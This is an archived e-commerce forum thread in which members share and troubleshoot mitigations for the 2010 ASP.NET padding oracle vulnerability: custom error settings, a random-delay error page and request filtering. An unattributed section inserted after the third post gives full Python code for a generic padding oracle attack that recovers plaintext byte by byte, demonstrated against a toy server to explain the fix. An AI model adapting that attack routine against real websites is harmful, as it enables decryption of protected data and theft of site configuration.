Important Notice from AspDotNetStorefront
It is with dismay that we report that we have been forced, through the action of hackers, to shut off write-access to this forum. We are keen to leave the wealth of material available to you for research. We have opened a new forum from which our community of users can seek help, support and advice from us and from each other. To post a new question to our community, please visit: http://forums.vortx.com

Thread: Urgent - Asp.net security vulnerability

  1. #1
    fooster is offline Member
    Join Date
    Jan 2007
    Posts
    98

    Default Urgent - Asp.net security vulnerability

    Everyone needs to implement this workaround ASAP:

    http://weblogs.asp.net/scottgu/archi...erability.aspx

    Can someone at ASPDNSF please also provide some basic guidance on this issue for non-technical people?

    It's a simple enough workaround to a very serious issue which could allow your web.config file to be downloaded.

  2. #2
    ssgumby is offline Senior Member
    Join Date
    Feb 2009
    Posts
    683

    Default

    If you're following ASPDNSF security best practices you are already safe.

    In the web.config simply make sure your custom errors looks like this.

    <customErrors mode="On" defaultRedirect="~/YourCustomErrorPage.aspx">
    <!-- defaultRedirect sends every unhandled error to one page; an <error> child element requires a statusCode -->
    </customErrors>

  3. #3
    fooster is offline Member
    Join Date
    Jan 2007
    Posts
    98

    Default

    Well, you should also be adding a small random delay if your site is a 3.5 SP1 or 4.0 website, and crucially adding the following to your web.config customErrors section:

    redirectMode="ResponseRewrite"

    like so:

    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.aspx" />


    If you don't do both of these things you are running an unacceptable risk of your site and server being compromised. This is a script-kiddie-level attack; it does not require great knowledge. If I were you I would be extremely paranoid; I would imagine ecommerce apps are one of the first places to be targeted.

    Read the following excellent dissection of the issue and the reasons behind how and why the specific fixes mentioned above work:

    http://www.troyhunt.com/2010/09/fear...ng-oracle.html


    ASPDNSF really needs to make some very strong recommendations as to what site owners need to do pronto. Read the article, understand what needs to be done and get your sites protected whilst MS work on a permanent fix.

    Having an encrypted web.config does not automatically protect you either, as it depends on how the web.config is encrypted (not yet looked at the code); if it's using the machine key, this is the very key that is being compromised, so your encrypted parts can be easily decrypted.

    Ben
    Last edited by fooster; 09-20-2010 at 02:23 PM. Reason: clarified the change required to the custom errors section
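The posts above say what to change but not what the single-error-page rule actually defeats. The following is an added illustration, not code from this thread or from AspDotNetStorefront: a self-contained Python toy of the mechanism the linked dissection describes. A hypothetical handler decrypts a CBC-encrypted token from the URL and serves the named resource; in its leaky form a padding failure gives HTTP 500 while valid padding with an unknown name gives 404, and in its fixed form every failure gets one identical response. The attacker never sees the key, only the status codes. The block cipher is a keyed one-way stand-in (CBC decryption only ever calls D, so a real cipher is not needed for the demo), and the key, resource name and status mapping are all constructed here. The timing channel that the random sleep in the error page addresses is not modelled.

```python
import hashlib
import secrets
from typing import Callable, Dict, Optional

BLOCK = 16

def _block_decrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in for the block cipher's D_k(): CBC decryption only ever calls D(),
    # so a keyed one-way function serves for a demo. It is not a real cipher.
    return hashlib.sha256(key + block).digest()[:BLOCK]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Returns IV || C1 || ... || Cn. Because D() is one-way the blocks are chosen
    # from the last one backwards: C[i-1] = D(C[i]) XOR P[i], and C[0] is the IV.
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n
    ct = [secrets.token_bytes(BLOCK)]
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        ct.insert(0, _xor(_block_decrypt(key, ct[0]), padded[i:i + BLOCK]))
    return b"".join(ct)

def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    out = b"".join(_xor(_block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(out)

class ResourceServer:
    # Hypothetical handler: decrypts a token from the URL and serves the named
    # resource. leaky=True: padding failure -> 500, valid padding but unknown
    # name -> 404. leaky=False: the customErrors fix, one response for any failure.
    def __init__(self, key: bytes, resources: Dict[bytes, bytes], leaky: bool):
        self.key, self.resources, self.leaky = key, resources, leaky

    def handle(self, token: bytes) -> int:
        try:
            name = cbc_decrypt(self.key, token)
        except ValueError:
            return 500 if self.leaky else 200
        return 200 if name in self.resources or not self.leaky else 404

def recover_block(oracle: Callable[[bytes], bool], prev: bytes, cur: bytes) -> Optional[bytes]:
    # Recovers P = D(cur) XOR prev one byte at a time from oracle(ct) == "padding
    # OK?". Returns None when the oracle does not separate padding failures from
    # other outcomes, which is what the fixed server produces.
    inter = bytearray(BLOCK)            # D(cur), learned from the last byte back
    for k in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - k
        forged = bytearray(BLOCK)       # replaces the real preceding block
        for j in range(k + 1, BLOCK):
            forged[j] = inter[j] ^ pad_val
        hits = []
        for guess in range(256):
            forged[k] = guess
            if not oracle(bytes(forged) + cur):
                continue
            if k == BLOCK - 1:
                # A hit here is \x01 or, by chance, a longer run such as \x02\x02;
                # disturbing the byte before it breaks only the longer runs.
                forged[k - 1] ^= 0xFF
                still_ok = oracle(bytes(forged) + cur)
                forged[k - 1] ^= 0xFF
                if not still_ok:
                    continue
            hits.append(guess)
        if len(hits) != 1:
            return None
        inter[k] = hits[0] ^ pad_val
    return _xor(bytes(inter), prev)

def padding_oracle_attack(oracle: Callable[[bytes], bool], ciphertext: bytes) -> Optional[bytes]:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    out = b""
    for prev, cur in zip(blocks, blocks[1:]):
        p = recover_block(oracle, prev, cur)
        if p is None:
            return None
        out += p
    return pkcs7_unpad(out)

def demo(leaky: bool) -> Optional[bytes]:
    # Constructed key and resource name; the attacker only ever sees status codes.
    key = hashlib.sha256(b"demo key, not a real machineKey").digest()
    secret_name = b"/App_Data/secret.config"
    server = ResourceServer(key, {secret_name: b"<config/>"}, leaky)
    token = cbc_encrypt(key, secret_name)          # what a client sees in a URL
    return padding_oracle_attack(lambda ct: server.handle(ct) != 500, token)

if __name__ == "__main__":
    print("leaky:", demo(True), "fixed:", demo(False))   # plaintext, then None
```

Against the leaky server the attacker gets the whole plaintext back from a few thousand requests that each returned nothing but a status code, which is the "script kiddie level" point made above. Against the fixed server every one of the 256 guesses for a byte looks identical, so recover_block reports no signal and the attack stops at the first byte; that is exactly what a single custom error page for every failure buys you. The random sleep recommended in the thread targets the timing version of the same distinction, which this toy leaves out.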

  4. #4
    ASPAlfred is offline Senior Member
    Join Date
    Nov 2007
    Posts
    2,244

    Default

    Thanks for the article.

    Well, we have Security Best Practices article that recommends what site owners should be doing prior to going live. Here's another link that might help also.

  5. #5
    ssgumby is offline Senior Member
    Join Date
    Feb 2009
    Posts
    683

    Default

    Alfred, the only thing missing is the time delay. I implemented this on my store, was pretty straight forward.

    http://www.microsoft.com/technet/sec...y/2416728.mspx

  6. #6
    DotNetDevelopments is offline Senior Member
    Join Date
    Jul 2008
    Location
    Harlow / Essex / UK
    Posts
    619

    Default

    Seems I am having issues with the fix.

    To my custom error cs page I have added (in the correct places)
    C#/VB.NET Code:
    using System.Security.Cryptography;
    using System.Threading;

    void Page_Load()
    {
        // sleep 0-255 ms, drawn from the crypto RNG, so error responses do not return in constant time
        byte[] delay = new byte[1];
        RandomNumberGenerator prng = new RNGCryptoServiceProvider();
        prng.GetBytes(delay);
        Thread.Sleep((int)delay[0]);

        // cast because RandomNumberGenerator is not IDisposable on older framework versions
        IDisposable disposable = prng as IDisposable;
        if (disposable != null) { disposable.Dispose(); }
    }
    and the web.config
    C#/VB.NET Code:
    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/customerrorpage.aspx" /> 
    However, when I go to a page that does not exist I see the ugly standard "Server Error in '/' Application" and not my nice custom error page. What have I done wrong?

    Our old web.config had
    C#/VB.NET Code:
    <customErrors mode="On" defaultRedirect="~/customerrorpage.aspx">
        <error statusCode="404" redirect="~/customerrorpage.aspx" />
    </customErrors>
    Please help.
    Many thanks.
    =====
    Version (Code/DB): AspDotNetStorefront MSx 9.1.0.1/9.1.0.0
    Execution Mode: 64 Bit
    Dot Net Developments - E-commerce By Experience

  7. #7
    esedirect is offline Senior Member
    Join Date
    Feb 2010
    Location
    Norfolk, UK
    Posts
    343

    Default

    Assuming your custom error page is customerrorpage.aspx.cs then it should be like this, I think. Seems to work for us!

    Code:
        using System;
        using System.Security.Cryptography;
        using System.Threading;

        public partial class customerrorpage : SkinBase
        {
            protected void Page_Load() {
              byte[] delay = new byte[1];
              RandomNumberGenerator prng = new RNGCryptoServiceProvider();

              prng.GetBytes(delay);
              Thread.Sleep((int)delay[0]);

              IDisposable disposable = prng as IDisposable;
              if (disposable != null) { disposable.Dispose(); }
            }
        }
    http://www.esedirect.co.uk
    --------------------------------------------------------------------------
    Using MS 9.2.0.0 with the following customisations:

    Lightbox/Fancybox enlarged images;
    Auto-suggest searchbox;
    Extra product information shown only to our IP Address (such as supplier info, costs, etc.);
    Failed transactions emailed via trigger;
    Custom app to show basket contents when customer online;
    Orders pushed through to accounting systems.

    All the above without source!

  8. #8
    DotNetDevelopments is offline Senior Member
    Join Date
    Jul 2008
    Location
    Harlow / Essex / UK
    Posts
    619

    Default

    We are using pagenotfound.aspx that comes out of the box

    which is by default
    C#/VB.NET Code:
    public class Resource
    I changed it to
    C#/VB.NET Code:
    public partial class Resource : SkinBase
    with no luck

    even changed it to
    C#/VB.NET Code:
    public partial class pagenotfound : SkinBase
    with no luck still

  9. #9
    esedirect is offline Senior Member
    Join Date
    Feb 2010
    Location
    Norfolk, UK
    Posts
    343

    Default

    We use pagenotfound out-of-the-box as well. So starting around line 76 (if you've already added the 2 extra using statements):

    Code:
        /// <summary>
        /// Summary description for PageNotFound
        /// </summary>
        public partial class PageNotFound : SkinBase
        {
            protected void Page_Load() {
              byte[] delay = new byte[1];
              RandomNumberGenerator prng = new RNGCryptoServiceProvider();
    
              prng.GetBytes(delay);
              Thread.Sleep((int)delay[0]);
                
              IDisposable disposable = prng as IDisposable;
              if (disposable != null) { disposable.Dispose(); }
            }
    
    ...

  10. #10
    DotNetDevelopments is offline Senior Member
    Join Date
    Jul 2008
    Location
    Harlow / Essex / UK
    Posts
    619

    Default

    thanks for that, guess I didn't see that pagenotfound was already mentioned.

    Sadly I am still seeing issues. I think we will go to our own error page just for the simplicity of it until I can see what is going all wrong!

  11. #11
    esedirect is offline Senior Member
    Join Date
    Feb 2010
    Location
    Norfolk, UK
    Posts
    343

    Default

    Don't want to state the bleedin' obvious, but in your OP you said:

    Code:
    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/customerrorpage.aspx" />
    Presumably you really have:
    Code:
    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/pagenotfound.aspx" />
    Just checking!

  12. #12
    DotNetDevelopments is offline Senior Member
    Join Date
    Jul 2008
    Location
    Harlow / Essex / UK
    Posts
    619

    Default

    Hehe, very true but no I do have the correct info in my web config.

    I have removed the redirectMode="ResponseRewrite" from the web.config file and just kept the C# in the pagenotfound.aspx, and it is all working fine; probably not fixing the vulnerability, but the best I can do on my current brain power.

  13. #13
    fooster is offline Member
    Join Date
    Jan 2007
    Posts
    98

    Default

    Another update on this, and further steps to mitigate your server's risk profile by creating a custom URLScan or Request Filtering rule.

    See here:


    http://weblogs.asp.net/scottgu/archi...erability.aspx